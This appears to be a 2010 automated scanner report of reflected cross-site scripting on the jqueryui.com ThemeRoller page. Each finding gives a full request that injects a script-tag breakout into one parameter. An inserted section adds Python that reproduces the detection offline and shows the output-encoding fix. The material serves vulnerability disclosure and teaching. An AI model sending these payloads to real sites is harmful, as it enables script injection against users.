The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69302"><script>alert(1)</script>d38504ae62d was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec69302"><script>alert(1)</script>d38504ae62d&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:51 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5f75"><script>alert(1)</script>80a5b434414 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=ccccccd5f75"><script>alert(1)</script>80a5b434414&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:01 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7afeb"><script>alert(1)</script>e6e1ca26fde was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee7afeb"><script>alert(1)</script>e6e1ca26fde&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
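Every finding in this part of the report is built the same way: the scanner keeps the parameter's normal value, appends a short random prefix, the breakout string "><script>alert(1)</script> and a random suffix, and then searches the 120 KB response for prefix...suffix. The random ends let it locate the reflection and prove the quote and angle brackets came back untouched, and a fresh pair per parameter shows which request produced which reflection, which is why each payload above carries different hex strings. The Python below is an added example, not code from the report or from jqueryui.com: it reproduces that check offline against a constructed stand-in for the ThemeRoller template (an assumption: every parameter is written into a double-quoted value="" attribute, the context each finding names), and runs the same check against the template with output encoding applied, which is the fix.

```python
import html
import re
import secrets
from urllib.parse import parse_qsl

# Constructed sample input: a subset of the ThemeRoller query string in the report.
SAMPLE_QUERY = (
    "bgColorHighlight=fbf9ee&bgColorHover=dadada&bgImgOpacityActive=65"
    "&bgTextureActive=02_glass.png&fcHeader=222222"
)

# The breakout the scanner sends between its random prefix and suffix.
BREAKOUT = '"><script>alert(1)</script>'


def render_unsafe(params):
    """Hypothetical stand-in for the vulnerable template (the real PHP is not
    on the page): each value lands unencoded inside a double-quoted attribute."""
    return "".join(
        f'<input type="text" name="{name}" value="{value}" />\n'
        for name, value in params
    )


def render_safe(params):
    """Same template with output encoding. html.escape(quote=True) encodes
    & < > " ' like PHP's htmlspecialchars($v, ENT_QUOTES, 'UTF-8')."""
    return "".join(
        '<input type="text" name="{}" value="{}" />\n'.format(
            html.escape(name, quote=True), html.escape(value, quote=True)
        )
        for name, value in params
    )


def make_canary():
    """5-hex prefix and 11-hex suffix, the shape of the payloads in the report."""
    return secrets.token_hex(3)[:5], secrets.token_hex(6)[:11]


def classify_reflection(body, prefix, suffix):
    """Find prefix...suffix in the response and report what survived between them."""
    m = re.search(re.escape(prefix) + "(.*?)" + re.escape(suffix), body, re.S)
    if not m:
        return "not reflected"
    middle = m.group(1)
    if middle == BREAKOUT:
        return "unescaped attribute breakout"      # the finding in the report
    if middle == html.escape(BREAKOUT, quote=True):
        return "html-encoded"                      # attribute boundary held
    return "modified"                              # filtered or mangled


def scan(query, renderer):
    """One mutated request per parameter: payload appended to the original
    value, exactly as the report's requests show."""
    base = parse_qsl(query, keep_blank_values=True)
    results = {}
    for i, (name, value) in enumerate(base):
        prefix, suffix = make_canary()
        mutated = base[:i] + [(name, value + prefix + BREAKOUT + suffix)] + base[i + 1:]
        results[name] = classify_reflection(renderer(mutated), prefix, suffix)
    return results


def vulnerable_params(query, renderer):
    return sorted(
        name for name, verdict in scan(query, renderer).items()
        if verdict == "unescaped attribute breakout"
    )


if __name__ == "__main__":
    for label, renderer in (("unsafe", render_unsafe), ("safe", render_safe)):
        print(label, scan(SAMPLE_QUERY, renderer))
```

With the unsafe renderer every parameter in the sample comes back as "unescaped attribute breakout", the verdict each finding on this page records; with the encoded renderer the same requests come back "html-encoded" and the attribute boundary holds. Note the check is a string match, not a browser: it tells you the quote and tag characters reached the page unencoded, which is the defect to fix, regardless of which client-side filters a given browser applies.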
The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44bcd"><script>alert(1)</script>001f9ca1294 was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada44bcd"><script>alert(1)</script>001f9ca1294&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddb02"><script>alert(1)</script>ab6c9905154 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaaddb02"><script>alert(1)</script>ab6c9905154&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6505"><script>alert(1)</script>5dfd401df80 was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaab6505"><script>alert(1)</script>5dfd401df80&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f16e"><script>alert(1)</script>1d046989701 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=658f16e"><script>alert(1)</script>1d046989701&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 685ca"><script>alert(1)</script>81a7908cbb4 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75685ca"><script>alert(1)</script>81a7908cbb4&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae3f"><script>alert(1)</script>de2a08a5946 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75fae3f"><script>alert(1)</script>de2a08a5946&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36c84"><script>alert(1)</script>41681df22b was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=9536c84"><script>alert(1)</script>41681df22b&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064
The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93e7f"><script>alert(1)</script>6bb1c029358 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=7593e7f"><script>alert(1)</script>6bb1c029358&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab27f"><script>alert(1)</script>a6e6f66d6d2 was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55ab27f"><script>alert(1)</script>a6e6f66d6d2&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
